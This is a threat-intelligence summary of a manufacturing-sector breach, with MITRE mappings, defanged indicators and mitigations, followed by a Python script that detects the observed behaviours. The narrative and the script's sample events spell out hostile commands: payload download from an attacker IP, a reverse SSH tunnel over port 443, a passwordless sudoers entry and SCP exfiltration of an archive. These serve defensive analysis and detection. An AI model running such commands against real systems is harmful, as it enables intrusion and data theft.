Analysis of Data Exfiltration Attacks: Strategies and Prevention in Manufacturing Sector Breaches – ReliaQuest

In July 2024 a threat actor exploited an internet-facing Fortinet firewall and brute-forced a privileged service account to gain SSH access to a development Linux host, then performed discovery, lateral movement, privilege escalation, and data exfiltration. The actor used common tools (curl/wget, SCP, WinRAR), established C2 via cloud-hosted IPs and an SSH reverse tunnel over port 443, and was partially contained by EDR/UBA and GreyMatter response actions. #Fortinet #SCP

Keypoints

  • Initial access was likely via a brute-force of the Fortinet administrator console, leading to use of a privileged service account (SVC_1).
  • The actor authenticated via SSH to a Linux development server and used living-off-the-land commands for discovery (ps, cat /etc/passwd, net view, etc.).
  • Lateral movement used SSH for Linux and RDP for Windows, targeting hosts without EDR or sufficient logging.
  • Privilege escalation and persistence were achieved by running sudo su, creating local users (itsupport), and editing /etc/sudoers directly.
  • Command-and-control involved wget/curl to download payloads from Vultr-hosted IPs and creating reverse SSH tunnels over port 443 to DigitalOcean hosts.
  • Execution attempts of a tarball payload were blocked by EDR; exfiltration attempts used WinRAR to archive data and SCP to transfer archives over ports 443/80 to attacker-controlled IPs.
  • Mitigations emphasized: patch perimeter devices, harden and monitor service accounts, ensure full EDR coverage, network segmentation, and block anomalous app traffic on non-standard ports.

MITRE Techniques

  • [T1078] Valid Accounts – Brute-forced and abused a privileged service account (SVC_1) to authenticate and gain access. [‘Brute-forced privileged service account to gain access.’]
  • [T1021] Remote Services – Used SSH for Linux and RDP for Windows to move laterally between hosts. [‘Used SSH and RDP for lateral movement between servers.’]
  • [T1068] Exploitation for Privilege Escalation – Escalated privileges by running sudo su and creating new administrative users. [‘Escalated privileges using “sudo su” and created new user accounts.’]
  • [T1041] Exfiltration Over C2 Channel – Compressed data with WinRAR and transferred archives via SCP to attacker-controlled servers over HTTP/S ports. [‘Used SCP and WinRAR to exfiltrate data to C2 servers.’]
  • [T1071] Application Layer Protocol – Retrieved payloads via HTTP(S) and used non-standard ports (e.g., SSH over 443) for C2. [‘Established C2 communication using non-standard ports.’]
  • [T1218] Signed Binary Proxy Execution / Defense Evasion – Installed and ran unauthorized software and manually edited sudoers to avoid detection, using common binaries and LotL commands. [‘Modified the sudoers file and installed unauthorized software to evade detection.’]

Indicators of Compromise

  • [IP Address] C2 and payload hosts – 149.28.219[.]210, 192.241.139[.]130, 45.77.94[.]53, 209.250.244[.]179, 167.172.134[.]147, 64.94.85[.]219.
  • [File Names] Payloads and tools observed – payload.tar.gz, DATA.rar, winrar-x64-701.exe.
  • [Usernames / Accounts] Service and persistence accounts – SVC_1 (compromised service account), itsupport (attacker-created local admin account).
  • [Tools / Domains] Download and tooling locations – curl/wget retrieval from hxxp[:]//149.28.219[.]210 and cdn.stubdownloader.services.mozilla.com (Firefox installer), the.earth[.]li (pscp.exe).
  • [Commands / Artifacts] Notable commands used for persistence, C2, and exfiltration – ssh -R reverse tunnel to port 443 (-p443), scp DATA.rar … -P 443 (SCP over the HTTPS port), nohup /tmp/payload (execution attempts blocked by EDR).

The technical sequence began with likely brute-force compromise of an internet-facing Fortinet appliance and discovery of a privileged service account (SVC_1). The actor repeatedly tested the account until authenticating via SSH to a Linux development host (Linux_Dev_Server_1). From there they ran living-off-the-land commands (last, ps aux, cat /etc/passwd, net view, quser) to enumerate users, privileges, and reachable network shares, enabling selection of high-value targets and hosts lacking EDR or logging.

Lateral movement used SSH between Linux systems and RDP to reach Windows hosts; the adversary created persistence by running sudo su, adding a local user (itsupport) on Linux and Windows, and attempting to modify /etc/sudoers. Command-and-control activity included downloading payloads with curl/wget from 149.28.219[.]210, establishing reverse SSH tunnels over port 443 to DigitalOcean hosts (ssh -R … -p443), and using SCP to move files to attacker-controlled IPs. Attempts to execute a retrieved tarball (tar xzvf, chmod +x, nohup) were repeatedly blocked by the EDR agent.

For data theft the actor compressed file-share data with WinRAR and transferred archives using OpenSSH SCP over commonly allowed ports (e.g., scp DATA.rar <user>@192.241.139[.]130 -P 443). Containment actions (EDR blocking, UBA detection, host isolation, account resets, and GreyMatter playbook actions) interrupted exfiltration. Practical controls derived from the incident include prompt patching of perimeter devices, strict service-account restrictions and monitoring, full EDR deployment, network segmentation, and detection/blocking of application traffic on non-standard ports.
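As an added example (not code from the ReliaQuest report), a small Python triage script that flags, in process command-line events, the behaviours the sequence above describes: payload retrieval from a bare IP, local account creation, direct sudoers edits, reverse SSH tunnels and SCP on web ports, and execution of a payload staged in /tmp. The sample events, the ops/backup usernames and the documentation-range IPs are constructed.

```python
import re

IP = r"\d{1,3}(?:\.\d{1,3}){3}"
WEB_PORT = r"(?:443|80)\b"

# One rule per behaviour from the incident: every "all" pattern must match the
# command line, and no "none" pattern may (sudoers edits via visudo are allowed).
RULES = {
    "download_from_bare_ip": {"all": [r"\b(?:curl|wget)\b", r"https?://" + IP]},
    "local_account_created": {"all": [r"\b(?:useradd|adduser)\b|\bnet\s+user\b.*\s/add\b"]},
    "sudoers_direct_edit":   {"all": [r"/etc/sudoers"], "none": [r"\bvisudo\b"]},
    "ssh_reverse_tunnel":    {"all": [r"\bssh\b", r"\s-R\s", r"\s-p\s*" + WEB_PORT]},
    "scp_on_web_port":       {"all": [r"\bscp\b", r"\s-P\s*" + WEB_PORT]},
    "nohup_exec_from_tmp":   {"all": [r"\bnohup\s+/tmp/"]},
}

def match_rules(cmd: str) -> list:
    """Return the names of every rule that fires on one command line."""
    hits = []
    for name, rule in RULES.items():
        ok = all(re.search(p, cmd) for p in rule["all"])
        if ok and not any(re.search(p, cmd) for p in rule.get("none", [])):
            hits.append(name)
    return hits

def triage(events: list) -> list:
    """Turn process events into findings, one per (event, rule) pair."""
    return [
        {"host": ev["host"], "user": ev["user"], "rule": rule, "cmd": ev["cmd"]}
        for ev in events
        for rule in match_rules(ev["cmd"])
    ]

# Constructed sample events shaped like the incident's command lines; the
# 198.51.100.0/24 and 203.0.113.0/24 addresses are documentation ranges, not IoCs.
SAMPLE_EVENTS = [
    {"host": "Linux_Dev_Server_1", "user": "SVC_1", "cmd": "cat /etc/passwd"},
    {"host": "Linux_Dev_Server_1", "user": "SVC_1", "cmd": "wget http://203.0.113.10/payload.tar.gz -O /tmp/payload.tar.gz"},
    {"host": "Linux_Dev_Server_1", "user": "root", "cmd": "useradd -m itsupport"},
    {"host": "Linux_Dev_Server_1", "user": "root", "cmd": "echo 'itsupport ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers"},
    {"host": "Linux_Dev_Server_1", "user": "root", "cmd": "ssh -fN -R 2222:127.0.0.1:22 ops@198.51.100.5 -p443"},
    {"host": "Linux_Dev_Server_1", "user": "root", "cmd": "nohup /tmp/payload &"},
    {"host": "Linux_Dev_Server_1", "user": "root", "cmd": "scp DATA.rar ops@198.51.100.5: -P 443"},
    {"host": "Linux_Dev_Server_1", "user": "SVC_1", "cmd": "scp report.txt backup@10.0.5.4:/srv/backup/"},
    {"host": "Linux_Dev_Server_1", "user": "root", "cmd": "visudo -c -f /etc/sudoers"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f['user']:<6} {f['rule']:<22} {f['cmd']}")
```

The benign SCP on the default port and the visudo check are deliberately left unflagged, which is the distinction the "non-standard ports" and "sudoers edited directly" observations rely on.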

Read more: https://www.reliaquest.com/blog/data-exfiltration-attack-analysis-manufacturing-sector-breach/